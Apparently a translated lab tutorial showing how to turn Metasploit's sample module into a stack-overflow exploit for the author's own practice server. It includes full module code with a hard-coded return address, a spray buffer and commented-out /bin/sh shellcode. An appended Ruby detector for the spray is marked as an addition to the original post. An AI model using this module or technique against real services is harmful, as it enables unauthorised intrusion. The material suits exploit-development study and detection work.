Now that we have a vulnerability, we can attack it. First we need to understand Metasploit's exploit modules; see

http://www.offensive-security.com/metasploit-unleashed/Exploit_Development

Metasploit itself is extremely powerful; it is not introduced further here.

First we need to add an exploit module for this specific vulnerability.

We modify the sample directly:

root@bt:~/.msf4/modules# mkdir exploits
root@bt:~/.msf4/modules# cd exploits
root@bt:~/.msf4/modules/exploits# mkdir linux
root@bt:~/.msf4/modules/exploits/linux# cp /pentest/exploits/framework/documentation/samples/modules/exploits/sample.rb myvictim.rb
root@bt:~/.msf4/modules/exploits/linux# ls
myvictim.rb myvictimserver.rb proftp_sreplace.rb

Then look at myvictim.rb:

##
# $Id: sample.rb 9212 2010-05-03 17:13:09Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

module Msf

###
#
# This exploit sample shows how an exploit module could be written to exploit
# a bug in an arbitrary TCP server.
#
###
class Exploits::Sample < Msf::Exploit::Remote

  #
  # This exploit affects TCP servers, so we use the TCP client mixin.
  #
  include Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Sample exploit',
      'Description'    => %q{
        This exploit module illustrates how a vulnerability could be exploited
        in a TCP server that has a parsing bug.
      },
      'Author'         => 'skape',
      'Version'        => '$Revision: 9212 $',
      'References'     =>
        [
        ],
      'Payload'        =>
        {
          'Space'    => 1000,
          'BadChars' => "\x00",
        },
      'Targets'        =>
        [
          # Target 0: Windows All
          [
            'Windows Universal',
            {
              'Platform' => 'win',
              'Ret'      => 0x41424344
            }
          ],
        ],
      'DefaultTarget'  => 0))
  end

  #
  # The sample exploit just indicates that the remote host is always
  # vulnerable.
  #
  def check
    return Exploit::CheckCode::Vulnerable
  end

  #
  # The exploit method connects to the remote service and sends 1024 A's
  # followed by the fake return address and then the payload.
  #
  def exploit
    connect

    print_status("Sending #{payload.encoded.length} byte payload...")

    # Build the buffer for transmission
    buf  = "A" * 1024
    buf += [ target.ret ].pack('V')
    buf += payload.encoded

    # Send it off
    sock.put(buf)
    sock.get

    handler
  end

end

end

Then we need to add it to Metasploit by running reload_all:

=[ metasploit v4.0.0-release [core:4.0 api:1.0]
+ -- --=[ 719 exploits - 361 auxiliary - 68 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
=[ svn r13462 updated 1208 days ago (2011.08.01)

Warning: This copy of the Metasploit Framework was last updated 1208 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306

msf > reload_all

msf > use exploit/linux/my
use exploit/linux/mysql/mysql_yassl_getname use exploit/linux/myvictimserver
use exploit/linux/mysql/mysql_yassl_hello
msf > use exploit/linux/my

The module we just added is not listed here, which means there is a problem with it and it must be modified. The modified version is as follows:

##
# $Id: myvictimserver.rb 9212 2014-11-03 17:13:09Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

###
#
# This exploit sample shows how an exploit module could be written to exploit
# a bug in an arbitrary TCP server.
#
###
class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  #
  # This exploit affects TCP servers, so we use the TCP client mixin.
  #
  include Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MyVictimSever',
      'Description'    => %q{
        This exploit module illustrates how a vulnerability could be exploited
        in a TCP server that has a stack overflow bug.
      },
      'Author'         => 'bai',
      'Version'        => '$Revision: 9212 $',
      'References'     =>
        [
        ],
      'Payload'        =>
        {
          'Space'    => 116,
          'BadChars' => "\x00",
        },
      'Targets'        =>
        [
          # Target 0: MyVictimSever on Linux
          [
            'MyVictimSever run on linux',
            {
              'Platform' => 'Linux',
              'Ret'      => 0xbffff4a4
            }
          ],
        ],
      'DefaultTarget'  => 0))
  end

  #
  # The sample exploit just indicates that the remote host is always
  # vulnerable.
  #
  def check
    return Exploit::CheckCode::Vulnerable
  end

  #
  # The exploit method connects to the remote service and sends the fake
  # return address, then the payload, then 100 more copies of the return
  # address.
  #
  def exploit
    connect

    print_status("Sending #{payload.encoded.length} byte payload...")

    # Build the buffer for transmission
    buf = ""
    #buf = "\x90" * 15
    #buf+="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    #buf+="\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    #buf+="\x80\xe8\xdc\xff\xff\xff/bin/sh";
    buf += "\xa4\xf4\xff\xbf"
    buf += payload.encoded
    buf += [].fill(target.ret, 0, 100).pack('V*')

    # Send it off
    sock.put(buf)
    sock.get

    handler
  end

end

Now the module can be found:

msf > use exploit/linux/my
use exploit/linux/mysql/mysql_yassl_getname use exploit/linux/myvictim
use exploit/linux/mysql/mysql_yassl_hello use exploit/linux/myvictimserver
msf > use exploit/linux/my
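As an added example (not part of the original post), a small Ruby detector for the shape of the buffer the module above sends: a long run of one repeated little-endian 32-bit word that looks like a pre-ASLR Linux stack address, which is the signature of the 100-copy return-address spray. The sample buffers are constructed here; a 116-byte placeholder stands in for the payload.

```ruby
# Added example, not from the original post: flag TCP payloads that contain
# a "return-address spray" like the one built by the module above
# (ret, payload, then 100 more copies of ret packed with 'V*').

# Does a 32-bit word look like a classic (pre-ASLR) Linux stack address?
def stack_pointer?(word)
  (word >> 24) == 0xbf
end

# Scan data at each of the four byte alignments (the spray need not be
# 4-byte aligned in the stream) for the longest run of one repeated word
# that looks like a stack pointer. Returns [word, run_length] for the longest
# run of at least min_run words, or nil if none qualifies.
def find_ret_spray(data, min_run: 16)
  best = nil
  (0..3).each do |align|
    words = data.byteslice(align..-1).to_s.unpack('V*')
    run  = 0
    prev = nil
    words.each do |w|
      if w == prev
        run += 1
      else
        prev = w
        run  = 1
      end
      next unless stack_pointer?(w) && run >= min_run
      best = [w, run] if best.nil? || run > best[1]
    end
  end
  best
end

# Constructed sample 1: the layout the module builds (ret + payload + spray),
# with 116 'X' bytes as a placeholder instead of a real payload.
RET = 0xbffff4a4
SPRAY_BUFFER = [RET].pack('V') + ("X" * 116) + [].fill(RET, 0, 100).pack('V*')

# Constructed sample 2: benign traffic with no such run.
BENIGN_BUFFER = "GET /index.html HTTP/1.0\r\nHost: example\r\n\r\n" * 10

if __FILE__ == $0
  p find_ret_spray(SPRAY_BUFFER)   # [3221222564, 100]
  p find_ret_spray(BENIGN_BUFFER)  # nil
end
```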
